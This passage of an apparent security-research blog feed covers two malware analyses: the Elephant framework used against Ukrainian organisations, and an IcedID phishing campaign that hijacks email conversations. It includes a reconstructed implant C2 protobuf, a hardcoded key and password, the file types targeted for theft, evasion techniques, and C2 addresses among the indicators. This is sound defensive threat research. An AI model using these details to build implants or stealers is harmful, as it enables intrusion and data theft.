not provided as a plain string. Instead it has been encrypted with AES in
Cipher-Block Chaining (CBC) mode. The malware decrypts the string with the
embedded key
(&lt;code&gt;f1d21960d8eb2fddf2538d29a5fd50b5f64a3f9bf06f2a3c4c950438c9a7f78e&lt;/code&gt;) and a null
IV. The port used by the C2 server is hardcoded to port 80.&lt;/p&gt;
&lt;p&gt;GrimPlant communicates with the C2 server over gRPC. The communication is
encrypted with TLS. The malware has an embedded root certificate that it uses
to verify that it talks to a trusted server. The code snippet shows parts of
the root certificate information. The certificate used by the C2 server has
been signed by this root certificate which allows the threat actor to rotate
the certificate without redeploying a new malware.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Version: 3 (0x2)
Serial Number:
6d:56:93:aa:f3:9d:b1:f7:15:4e:39:64:77:9c:7e:d0:d4:cf:f6:3e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C = FR, ST = Occitanie, L = Toulouse, O = O, OU = E, CN = *.a.com, emailAddress = a@mail.com
Validity
Not Before: Mar 20 15:21:06 2022 GMT
Not After : Mar 20 15:21:06 2023 GMT
Subject: C = FR, ST = Occitanie, L = Toulouse, O = O, OU = E, CN = *.a.com, emailAddress = a@mail.com
SHA1 Fingerprint=DC:A9:5B:DC:F0:53:55:73:7A:A6:79:85:43:F6:3E:7C:23:07:36:33&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;There are only a handful of gRPC &amp;ldquo;methods&amp;rdquo; supported by the malware. A
reconstructed protobuf specification is shown in the code snippet below. To
identify which instance of the malware is sending the request to the C2 server,
the malware uses its machine ID as an unique identifier in the messages. When
the malware first connects to the C2 server, it authenticates itself with the
password &lt;code&gt;sdrunlygvhwbcaeiuklgunvre&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;After a successful authentication, it sends a heartbeat message every 10
seconds. This message includes information about the infected machine: public
IP address, hostname, username, etc. In addition to the heartbeat message, the
malware starts the &amp;ldquo;command&amp;rdquo; loop that checks for new commands to execute every
3 seconds. If a command is received it executes it by spawning a PowerShell
instance by executing
&lt;code&gt;%windir%\SysWOW64\Windows\PowerShell\v1.0\powershell.exe&lt;/code&gt; and returns the
result to the C2 server.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;service Implant {
rpc FetchCommand(FetchCmdRequest) returns FetchCmdResponse {}
rpc Heartbeat(stream HeartbeatRequest) returns (stream Empty) {}
rpc Login(ImplantLoginRequest) returns ImplantLoginResponse {}
rpc SendCmdOutput(SendCmdRequest) returns SendCmdResponse {}
}
message FetchCmdRequest {
string id = 1;
}
message FetchCmdResponse {
string adminId = 1;
bytes cmdText = 2;
}
message HeartbeatRequest {
string id = 1;
bytes sysInfo = 2;
}
message ImplantLoginRequest {
string id = 1;
bytes sysInfo = 2;
string password = 3;
}
message ImplantLoginResponse {
string token = 1;
}
message SendCmdRequest {
string adminId = 1;
bytes output = 2;
bytes error = 3;
}
message SendCmdResponse {}
message Empty {}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Client Component (GraphSteel)&lt;span class="hx:absolute hx:-mt-20" id="client-component-graphsteel"&gt;&lt;/span&gt;
&lt;a href="#client-component-graphsteel" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The &amp;ldquo;client&amp;rdquo; component is a credential and file stealer. It communicates with
the C2 server over WebSockets to a GraphQL endpoint. All the messages are
encrypted with AES. The key is received from the C2 server. The malware author
has written their own RSA implementation for the key exchange that is used to
receive the shared secret. All messages prior to the key exchange, including
the key exchange itself, are encrypted with AES using a hardcoded key.&lt;/p&gt;
&lt;p&gt;The credentials on the machine are stolen using code lifted from
&lt;a href="https://github.com/kerbyj/goLazagne"target="_blank" rel="noopener"&gt;goLazagne&lt;/a&gt;. In addition to stealing
credentials, the malware will look in the user&amp;rsquo;s &lt;code&gt;Documents&lt;/code&gt;, &lt;code&gt;Downloads&lt;/code&gt;,
&lt;code&gt;Pictures&lt;/code&gt;, and &lt;code&gt;Desktop&lt;/code&gt; folder for files with the file-extensions listed in
the snippet below.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;.key, .crt, .json, .csv, .7z, .rar, .zip, .ssh, .ovpn, .pptx, .xlsx, .docx, .ppt, .xls,
.doc, .txt&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;If it finds a file with a matching file extension, it generates the MD5 hash
for the file and checks with the C2 server if the file has already been
uploaded. If it hasn&amp;rsquo;t, the file is uploaded to the C2 server.&lt;/p&gt;
&lt;h2&gt;Infrastructure&lt;span class="hx:absolute hx:-mt-20" id="infrastructure"&gt;&lt;/span&gt;
&lt;a href="#infrastructure" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Using the embedded CA certificate in the malware, we uncovered older service
certificates and IP addresses. The oldest certificate we discovered had a
validity date of &amp;ldquo;not before&amp;rdquo; December 9th, 2021. The IP address of the server
where this certificate was served from is owned by the Russian hosting provider
Zservers and still returned Elephant components as of April 2022. The
components retrieved from the server are very similar to the samples used at
the end of March. The other hosting providers used by the threat actor are PQ
Hosting and Serverion.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/04/elephant-malware-targeting-ukrainian-orgs/images/fig6.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The threat actor has chosen to sprinkle some French connections within their
infrastructure. The certificates use French location information and the domain
name &lt;code&gt;forkscenter[.]fr&lt;/code&gt;. We don&amp;rsquo;t know if the decision to name it Elephant is a
nod to
&lt;a href="https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope"target="_blank" rel="noopener"&gt;Babar&lt;/a&gt;,
an espionage software attributed to a French intelligence agency, or intended
as a &amp;ldquo;false flag.&amp;rdquo;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;UAC-0056 (TA471, SaintBear, UNC2589) started using a new malware framework
called Elephant back in December 2021. The malware has been delivered in
targeted spear phishing campaigns using spoofed Ukrainian governmental email
addresses. The malware consists of at least four different components that are
used for stealing credentials, documents, and to provide remote access to the
infected machine. The threat actor has opted to use multiple protocols for C2
communication, gRPC and GraphQL over websockets. This is an interesting choice
as it complicates the development of the framework with more code to maintain.&lt;/p&gt;
&lt;h2&gt;Indicators of Compromise&lt;span class="hx:absolute hx:-mt-20" id="indicators-of-compromise"&gt;&lt;/span&gt;
&lt;a href="#indicators-of-compromise" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;194.31.98.124 - C2 address used by the malware
87.249.139.161 - IP address that was used for sending the emails
IP addresses used in previous campaigns.
91.242.229.35
45.84.0.116
80.66.76.187
Original Email 3c2022fea48b52326f9eec4c1c84f10b
xls da305627acf63792acb02afaf83d94d1
Base-update.exe 06124da5b4d6ef31dbfd7a6094fc52a6
Java-sdk 36ff9ec87c458d6d76b2afbd5120dfae
oracle-java 4a5de4784a6005aa8a19fb0889f1947a
Microsoft-cortana 6b413beb61e46241481f556bb5cdb69c
Samples from oldest server found
8e0eb1742b47745ff73389673996e964
cbc0e802b7134e1d02df1f2eb1b1d1e2
628f41776ae3b2e8343eeb9cdcd019f2
More Emails linked to the same sender IP
C7051e88ae43c1bd4b869cf18280ec5e
40b42005e9cfc5ea2a7cfc1ced975cbb
Fbe3cb4dfce740c3728c459b853e4249 (email submitted and target Romania)
Paths
%HOME%AppDataLocalTempBase-Update.exe
%HOME%.java-sdk&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>New Conversation Hijacking Campaign Delivering IcedID</title><link>https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/</link><pubDate>Mon, 28 Mar 2022 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/</guid><description>
&lt;p&gt;&lt;em&gt;This post describes the technical analysis of a new campaign detected by
Intezer&amp;rsquo;s research team, which initiates attacks with a phishing email that
uses conversation hijacking to deliver IcedID.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The underground economy is constantly evolving with threat actors specializing
in specific fields. One field that has bloomed in the last few years is initial
access brokers. Initial access brokers specialize in gaining an initial
beachhead access to organizations and once achieved, sell the access to other
threat actors that monetize it further.&lt;/p&gt;
&lt;p&gt;Some of the customers to initial access brokers buy the access to deploy
ransomware.
&lt;a href="https://www.proofpoint.com/uk/blog/threat-insight/first-step-initial-access-leads-ransomware"target="_blank" rel="noopener"&gt;Proofpoint&lt;/a&gt;
has identified ten access brokers that sell access to ransomware groups. These
access brokers largely infect their victims with banking trojans that are later
used to deploy another malware at the &amp;ldquo;purchaser&amp;rsquo;s request.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;One of these banking trojans that have been used to deploy
&lt;a href="https://www.mandiant.com/resources/melting-unc2198-icedid-to-ransomware-operations"target="_blank" rel="noopener"&gt;ransomware&lt;/a&gt;
is IcedID (BokBot). IcedID was first reported on by
&lt;a href="https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/"target="_blank" rel="noopener"&gt;IBM X-Force in November 2017&lt;/a&gt;
and the malware
&lt;a href="https://intezer.com/blog/research/icedid-banking-trojan-shares-code-pony-2-0-trojan/"target="_blank" rel="noopener"&gt;shared some code with Pony&lt;/a&gt;.
While initially designed to steal banking credentials, like many other banking
trojans, the malware has been repurposed for deploying other malware on the
infected machines.&lt;/p&gt;
&lt;p&gt;One way IcedID infects machines is via phishing
&lt;a href="https://unit42.paloaltonetworks.com/ta551-shathak-icedid/"target="_blank" rel="noopener"&gt;emails&lt;/a&gt;. The
infection chain that commonly has been used is an email with an attached
password protected &lt;code&gt;zip&lt;/code&gt; archive. Inside the archive is a macro enabled office
document that executes the IcedID installer. Some phishing emails reuse
previously stolen emails to make the lure more convincing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In the new IcedID campaign we have discovered a further evolution of the
threat actors&amp;rsquo; technique.&lt;/strong&gt; The threat actor now uses compromised Microsoft
Exchange servers to send the phishing emails from the account that they stole
from. The payload has also moved away from using office documents to the use of
ISO files with a Windows LNK file and a DLL file. The use of ISO files allows
the threat actor to bypass the
&lt;a href="https://attack.mitre.org/techniques/T1553/005/"target="_blank" rel="noopener"&gt;Mark-of-the-Web&lt;/a&gt; controls,
resulting in execution of the malware without warning to the user. &lt;strong&gt;With
regards to targeting, we have seen organizations within energy, healthcare,
law, and pharmaceutical sectors.&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Infection Chain&lt;span class="hx:absolute hx:-mt-20" id="infection-chain"&gt;&lt;/span&gt;
&lt;a href="#infection-chain" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The attack-chain starts with a phishing email. The email includes a message
about some important document and has a password protected &lt;code&gt;zip&lt;/code&gt; archive file
attached. The password to the archive is given in the email body, as can be
seen in the screenshot below. What makes the phishing email more convincing is
that it&amp;rsquo;s using conversation hijacking (thread hijacking). &lt;strong&gt;A forged reply to
a previous stolen email is being used.&lt;/strong&gt; Additionally, the email has also been
sent from the email account from whom the email was stolen from.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The content of the zip archive is shown in the screenshot below. It includes a
single &lt;code&gt;ISO&lt;/code&gt; file with the same filename as the zip archive. It can also be
seen that the file was created not that long before the email was sent.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig3.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The ISO file includes two files, a LNK file named &lt;code&gt;document&lt;/code&gt; and a DLL file
named &lt;code&gt;main&lt;/code&gt;. From the timestamps it can be concluded that the DLL file was
prepared the day before while the LNK file was prepared about a week before. It
is possible that the LNK file has been used in earlier phishing emails.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig4.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The LNK file has been made to look like a document file via its embedded icon
file. As can be seen in the screenshot below, when a user double clicks the
link file, it uses &lt;code&gt;regsvr32&lt;/code&gt; to execute the DLL file.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The use of &lt;a href="https://attack.mitre.org/techniques/T1218/010/"target="_blank" rel="noopener"&gt;&lt;code&gt;regsvr32&lt;/code&gt;&lt;/a&gt; allows
for proxy execution of malicious code in &lt;strong&gt;&lt;code&gt;main.dll&lt;/code&gt;&lt;/strong&gt; for defense evasion.
The DLL file is a loader for the IcedID payload. It contains a number of
exports, most of which consist of junk code.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig6.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The loader will locate the encrypted payload, stored in the resource section of
the binary. It does this through the technique &lt;em&gt;API hashing&lt;/em&gt;. A decompilation
of the simple hashing function is shown below.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig7.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The resulting hash is then compared with a hardcoded hash, locating the call
for &lt;strong&gt;&lt;code&gt;FindResourceA&lt;/code&gt;&lt;/strong&gt;. The function is dynamically called to fetch the
payload.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig8.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig9.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Memory is allocated using &lt;strong&gt;&lt;code&gt;VirtualAlloc&lt;/code&gt;&lt;/strong&gt; to hold the decrypted payload.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig10.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The IcedID &amp;ldquo;Gziploader&amp;rdquo; payload is decoded and placed in memory and then
executed. GZiploader fingerprints the machine and sends a beacon to the command
and control server with information about the infected host. The information is
smuggled through the cookies header via an HTTP GET request.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig11.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The C2 is located at &lt;code&gt;yourgroceries[.]top&lt;/code&gt;. The C2 can respond with a further
stage to be dropped and executed. The C2 did not respond with a payload during
our analysis.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig12.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h2&gt;Conversation Hijacking as a Phishing Technique&lt;span class="hx:absolute hx:-mt-20" id="conversation-hijacking-as-a-phishing-technique"&gt;&lt;/span&gt;
&lt;a href="#conversation-hijacking-as-a-phishing-technique" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The technique of hijacking an already existing conversation over email to
spread malware is something threat actors have been using for a while. Normally
email messages are stolen during an infection and used in future attacks to
make the phishing email appear more legitimate. In the last six months, threat
actors have evolved the technique further to make it even more convincing.
Instead of sending the stolen conversation to the victim with a &amp;ldquo;spoofed&amp;rdquo; email
address, threat actors are now using the email address of the victim that they
stole the original email from to make the phishing email even more convincing.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://twitter.com/GossiTheDog/status/1455204386834206729"target="_blank" rel="noopener"&gt;Kevin Beaumont&lt;/a&gt;
reported on this conversation hijacking technique back in November 2021 being
used to distribute Qakbot. Through the investigation, he confirmed that the
Microsoft Exchange servers where the emails originated from had evidence of
being exploited by ProxyShell.&lt;/p&gt;
&lt;h2&gt;New Campaign Discovered in March 2022&lt;span class="hx:absolute hx:-mt-20" id="new-campaign-discovered-in-march-2022"&gt;&lt;/span&gt;
&lt;a href="#new-campaign-discovered-in-march-2022" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In the current mid-March campaign, we have discovered reuse of the same stolen
conversation now being sent from the email address that received the latest
email. Back in January when this conversation was also used, the &lt;code&gt;FROM&lt;/code&gt; address
was &lt;code&gt;webmaster@[REDACTED].com&lt;/code&gt; with the name of the recipient of the last email
in the conversation. By using this approach, the email appears more legitimate
and is transported through the normal channels which can also include security
products.&lt;/p&gt;
&lt;p&gt;The majority of the originating Exchange servers we have observed appear to
also be unpatched and publicly exposed, making the ProxyShell vector a good
theory. While the majority of the Exchange servers used to send the phishing
emails can be accessed by anyone over the Internet, we have also seen a
phishing email sent internally on what appears to be an &amp;ldquo;internal&amp;rdquo; Exchange
server.&lt;/p&gt;
&lt;p&gt;The code snippet below shows a small part of the email header. The IP address
of the Exchange server is a local IP address (&lt;code&gt;172.29.0.12&lt;/code&gt;) with a top-level
domain name of &lt;code&gt;local&lt;/code&gt;. We can also see a header added by Exchange marking it
as an internal email. The exchange server also has added a header of the
original client (&lt;code&gt;172.29.5.131&lt;/code&gt; which also is a local IP address) that
connected to the Exchange server over
&lt;a href="https://social.technet.microsoft.com/Forums/lync/en-US/4775f066-4734-4ccd-a998-0ea43fad7069/xmsexchangeorganizationauthmechanism-possible-values?forum=exchangesvrsecuremessaging"target="_blank" rel="noopener"&gt;MAPI&lt;/a&gt;.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;Received: from ExchSrv01.[REDACTED].local (172.29.0.12) by
ExchSrv01.[REDACTED].local (172.29.0.12) with Microsoft SMTP Server
(version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.2.464.5
via Mailbox Transport; Thu, 10 Mar 2022 14:34:29 &amp;#43;0100
Received: from ExchSrv01.[REDACTED].local (172.29.0.12) by
ExchSrv01.[REDACTED].local (172.29.0.12) with Microsoft SMTP Server
(version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.2.464.5;
Thu, 10 Mar 2022 14:34:29 &amp;#43;0100
Received: from ExchSrv01.[REDACTED].local ([fe80::b148:8e7:61f8:61b4]) by
ExchSrv01.[REDACTED].local ([fe80::b148:8e7:61f8:61b4%6]) with mapi id
15.02.0464.005; Thu, 10 Mar 2022 14:34:29 &amp;#43;0100
…
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 04
X-MS-Exchange-Organization-AuthSource: ExchSrv01.[REDACTED].local
X-MS-Has-Attach: yes
X-MS-Exchange-Organization-SCL: -1
X-MS-Exchange-Organization-RecordReviewCfmType: 0
x-ms-exchange-organization-originalclientipaddress: 172.29.5.131
x-ms-exchange-organization-originalserveripaddress: fe80::b148:8e7:61f8:61b4%6&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;We didn&amp;rsquo;t manage to find a corresponding public IP address for this Exchange
server and it is not known to us how it was accessed by the threat actor. The
only thing we managed to find was a &lt;a href="https://roundcube.net/"target="_blank" rel="noopener"&gt;roundcube&lt;/a&gt; webmail
instance. The login page is shown in the screenshot below.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig13.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;One of the headers in the snippet above reported that the client connected to
the server via MAPI.
&lt;a href="https://docs.microsoft.com/en-us/exchange/clients/mapi-mailbox-access?view=exchserver-2019"target="_blank" rel="noopener"&gt;MAPI&lt;/a&gt;
is a protocol used (for example, by Outlook) to access the mailbox on an
Exchange server. This suggests that the threat actor used an Exchange client
instead of using SMTP to send the email. We have also seen the header
&lt;code&gt;X-Mailer: Microsoft Outlook 16.0&lt;/code&gt; in multiple phishing emails. In other
phishing emails a &lt;code&gt;X-Originating-IP&lt;/code&gt; header can be found. This is a header
added by the Exchange server when the web interface is used. The IP address in
the header is that of the client that connected to the server. We have observed
both hosting providers and non-commercial IP addresses for the client IP.&lt;/p&gt;
&lt;h2&gt;Attribution&lt;span class="hx:absolute hx:-mt-20" id="attribution"&gt;&lt;/span&gt;
&lt;a href="#attribution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In June 2021, Proofpoint released a
&lt;a href="https://www.proofpoint.com/uk/blog/threat-insight/first-step-initial-access-leads-ransomware"target="_blank" rel="noopener"&gt;report&lt;/a&gt;
on different access brokers that facilitates access for ransomware groups. Of
the different threat actors, according to Proofpoint, two of them (TA577 and
TA551) used IcedID as their malware. The techniques used by TA551 include
&lt;a href="https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity"target="_blank" rel="noopener"&gt;conversation hijacking&lt;/a&gt;
and
&lt;a href="https://www.mandiant.com/resources/melting-unc2198-icedid-to-ransomware-operations"target="_blank" rel="noopener"&gt;password&lt;/a&gt;
&lt;a href="https://unit42.paloaltonetworks.com/ta551-shathak-icedid/"target="_blank" rel="noopener"&gt;protected&lt;/a&gt;
&lt;a href="https://unit42.paloaltonetworks.com/ta551-shathak-icedid/"target="_blank" rel="noopener"&gt;zip&lt;/a&gt; files. The
group is also
&lt;a href="https://www.bitdefender.fr/files/News/CaseStudies/study/391/IceID-CREAT-5156.pdf"target="_blank" rel="noopener"&gt;known&lt;/a&gt;
to use &lt;code&gt;regsvr32.exe&lt;/code&gt; for signed binary proxy execution for malicious DLLs.&lt;/p&gt;
&lt;h2&gt;Summary&lt;span class="hx:absolute hx:-mt-20" id="summary"&gt;&lt;/span&gt;
&lt;a href="#summary" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The use of conversation hijacking is a powerful social engineering technique
that can increase the rate of a successful phishing attempt. The payload has
been moved away from office documents to the use of ISO files, employing the
use of commodity packers and multiple stages to hide activity. It is important
to be able to detect malicious files in memory to detect this type of attack.
We recommend you use an
&lt;a href="https://docs.intezer.com/hc/en-us/articles/360021350340-Conduct-Live-Endpoint-Analysis"target="_blank" rel="noopener"&gt;endpoint scanner&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/03/conversation-hijacking-campaign-delivering-icedid/images/fig14.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;ISO File:
3542d5179100a7644e0a747139d775dbc8d914245292209bc9038ad2413b3213
Loader DLL:
698a0348c4bb8fffc806a1f915592b20193229568647807e88a39d2ab81cb4c2
LNK File:
a17e32b43f96c8db69c979865a8732f3784c7c42714197091866473bcfac8250
IcedID GZiploader Network:
